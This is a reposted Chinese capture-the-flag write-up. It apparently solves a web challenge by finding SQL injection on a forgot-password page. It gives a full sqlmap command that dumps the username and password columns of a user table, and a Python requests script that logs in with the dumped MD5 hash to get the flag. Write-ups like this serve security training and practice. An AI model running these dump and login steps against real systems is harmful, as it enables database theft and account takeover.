2019-12-04

根据题目提示在登录及注册中有漏洞

首先进入登录界面,寻求漏洞,BP抓包,发现为明文传输,第一个想到爆破,但是爆破结果不尽人意,没有任何用出;接下来进行SQL注入尝试,但是俩个界面均没有POST注入漏洞,正要放弃时,发现在登录界面还有一个忘记密码界面,尝试在该界面进行SQL注入,

python2 sqlmap.py -r post.txt --dump -C "username,password" -T "user" -D "cetc004"

放进sqlmap直接跑出user表内的内容,如下图所示

其中admin为测试时注册数据,第一个username为自身信息,后password则为其密码,但是该md5加密后的数据无法在寻常网站上解密,故,构造一个python的请求报文脚本,来获取flag

import requests

url = 'http://111.198.29.45:54376/login.php'

username = 'c3tlwDmIn23'

password = '2f8667f381ff50ced6a3edc259260ba9'

payloads = { 'username':username, 'password':password }

r = requests.post(url, data = payloads)

print (r.text)

获取到的flag如下图所示

————————————————

版权声明:本文为CSDN博主「记忆湛蓝天空」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。

原文链接:https://blog.csdn.net/qq_41941506/article/details/90381051

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,191评论 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,547评论 2 22
  • 重置3850交换机密码 转自:51CTO博客作者CaiJiantao的原创作品 https://blog.51ct...
    傲然怒放阅读 125评论 0 0
  • # developer # ### 一、快速开始: 1,安装部署 nacos 参考:https://nacos.i...
    gomcarter阅读 488评论 0 0
  • 学习XML用法
    秦振江_师大阅读 141评论 0 1

友情链接更多精彩内容